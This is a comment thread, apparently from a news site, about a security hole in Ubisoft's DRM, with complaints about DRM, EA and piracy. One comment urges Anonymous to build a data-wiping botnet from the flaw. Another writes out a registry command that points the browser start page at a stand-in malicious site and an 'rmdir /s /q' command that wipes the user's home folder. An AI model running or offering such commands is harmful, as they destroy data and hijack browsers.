that's the sort of thing that can put a hacker in jail for five and a third to 10. Sony only paid a minor fine for slipping a rootkit into their customer's computers tho, so Ubisoft will likely get a slap on the wrist for raping US computer crimes laws.

Remember - computer crimes laws don't apply to corporations. they only apply to the little people like you and me.

Ubisoft has always had the worst DRM issues. Everything they do to combat piracy ends up hurting their sales as they punish the legitimate consumer more than they could ever hope to punish a pirate.

I believe that one of these days they will create DRM that will actually stop pirates, but it won't sell a single copy because of how much it punishes the people who actually do buy it.

But... corporations are people, right? Can someone go handcuff Ubisoft and drag them to jail?

Ubisoft: the latest victim of the Electronic Arts giant vampire squid.

They used to be one of the best in the industry. But now there's nothing left of that developer but ruined franchises and smoldering ashes.

Once again, EA killed the golden goose.

Somebody in Anonymous needs to create a botnet using this Ubisoft DRM backdoor, and wipe out all systems running the Ubisoft malware, with a big "ha ha" image on bootup along with "thank Ubisoft for your destroyed data"

I imagine the court cases that would ensue might just put an end to the asshattery of obtrusive DRM once and for all.

It is a PC I already have, and to do gaming, generally all I need is to add a decent video card. If it breaks, I can fix it.

When it is too old for newer games it can be given to a non-gamer who can still use it as a PC.

How many PC players hook it up to their living room TV? And if so then it's "Bad resolution", you can't have it both ways.

Stop as in a permanent stop or stop as in 'excessive delay'? It's just even Diablo 3 is going to get a private server sooner or later (if it hasn't already) and well... cartridges didn't stop people pirating games (I remember seeing something that'd dump SNES games to zip disk/FDD's). Even back in the days of the Amiga & ST you'd have cartridge's with DRM ROM's on them... they got ripped and circulated.

I don't think they'll ever create one that stops piracy, but I do think they'll create one that pisses of their customers enough to not buy it though.

Ubisoft put out a version of SHIII without the DRM after much derision. I run it now with GWX. I've been told SHV is nice, but quite frankly, I like to be able to play without necessarily having an internet connection, so fark them.

If it can start a program installed on a windows PC I could think of a couple of ways that could be exploited.
reg add for instance
reg add HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main /v Start Page /t string /d http://www.exploitwebsite.com?redirect=www.google.ca
Or some such thing.
Anything a user can do to their system you could do as well, as long as you know the command line.
rmdir /s /q %homedrive%%homepath%
Which would try to remove every file and directory from the user's directory, IE Don't do that!

I know this is a complete thread derail, but while I definitely prefer the complexity of computer games to what you find on consoles (the kind of action-oriented games which have typically been done better in the arcades), there are tons of good console video games still being made. You just have to search for them and pretty much ignore the journlolists and their review scores. That said, if you're playing video games because "well, it's what my friends are playing", then you're pretty much dooming yourself to playing average to bad games for the rest of your life. See: Call of Duty, StarCraft II: Wings of Liberty, etc. At this point, I really do agree with the sentiment that people should stop fighting over consoles and platforms and just play what's good. And there's good games on pretty much every platform. (Yes, even the Wii.)
